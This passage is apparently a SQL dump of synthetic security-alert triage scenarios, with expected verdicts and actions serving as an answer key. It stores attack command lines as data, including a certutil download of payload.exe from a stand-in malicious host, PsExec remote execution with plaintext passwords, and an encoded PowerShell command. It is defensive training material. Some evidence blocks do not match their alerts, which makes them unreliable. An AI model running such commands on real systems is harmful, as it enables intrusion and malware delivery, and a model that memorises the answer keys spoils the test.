Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(610, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a link to a known malicious domain was received by a user.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"192.168.1.20\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"phish@evil.com\",\"url\":\"http://phishing.example.com\",\"email_subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 21:27:24', '2026-02-16 18:03:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phish@evil.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://phishing.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing schemes.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a malicious site, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:22.248Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(611, 'Internal Network Lateral Movement via PSExec', 'medium', 'Wazuh', 'A suspicious PSExec activity was detected moving laterally within the network from one internal host to another.', 'Lateral Movement', 'T1077', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\"}', '2026-01-11 02:27:11', '2026-03-10 00:01:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the initiating host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target host.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage can indicate lateral movement.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec used to execute commands remotely, indicating possible lateral movement.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(612, 'Brute Force Login Attempt Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from a foreign IP address, indicating a possible brute force attack.', 'Credential Attack', 'T1110', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"failed_attempts\":25}', '2026-01-09 19:58:44', '2026-02-22 04:55:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported in multiple brute force attempts but not confirmed malicious.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted by attackers.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP showed failed login attempts but without successful access. 
No further malicious activity detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.251Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(613, 'Suspicious PowerShell Execution Detected with Encoded Command', 'high', 'CrowdStrike', 'A PowerShell process was detected executing an encoded command, indicating possible obfuscation attempts to evade detection.', 'Malware', 'T1086', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-10T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 04:01:28', '2026-02-18 13:55:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for obfuscation detected in multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent suspicious activity, but not confirmed malicious\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is a common tactic for malware to evade detection. 
This activity requires further investigation and containment.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(614, 'Internal Network Lateral Movement via PSExec', 'critical', 'Wazuh', 'An internal system was used to execute a remote command on another internal machine using PSExec, indicating potential lateral movement.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-10T21:12:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.75\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\"}', '2026-01-10 10:01:55', '2026-02-16 18:04:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of the initiating system within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of the target system within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec used for lateral movement, a known technique for spreading malware internally\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec for remote command execution is a strong indicator of lateral movement within the network. 
Immediate investigation and host isolation are advised.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.253Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-10T21:12:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(615, 'Potential Data Exfiltration via Certutil', 'high', 'Splunk', 'Certutil was observed being used to download a file from an external source, a technique often used for data exfiltration or downloading malicious payloads.', 'Data Exfil', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.100\",\"dst_ip\":\"203.0.113.85\",\"username\":\"hsmith\",\"hostname\":\"WORKSTATION-03\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\"}', '2026-01-10 07:17:02', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download potentially malicious file\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of certutil for downloading files from external sources is indicative of data exfiltration or malware download. 
Further investigation is necessary.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.254Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:25:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.100\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"username\\\":\\\"hsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-03\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(616, 'False Positive: Legitimate Use of MSHTA Detected', 'medium', 'IDS', 'An MSHTA execution was detected, which is commonly used by attackers for executing scripts. However, this instance was identified as a legitimate use case by an internal script.', 'Malware', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:40:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.120\",\"dst_ip\":\"\",\"username\":\"serviceaccount\",\"hostname\":\"SERVER-02\",\"command_line\":\"mshta.exe http://intranet.example.com/script.hta\",\"domain\":\"intranet.example.com\"}', '2026-01-10 16:40:24', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server executing the script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://intranet.example.com/script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Legitimate execution of an internal script\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"intranet.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Internal domain for legitimate business operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected use of MSHTA was verified to be legitimate for executing an internal script. 
No malicious activity was confirmed.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 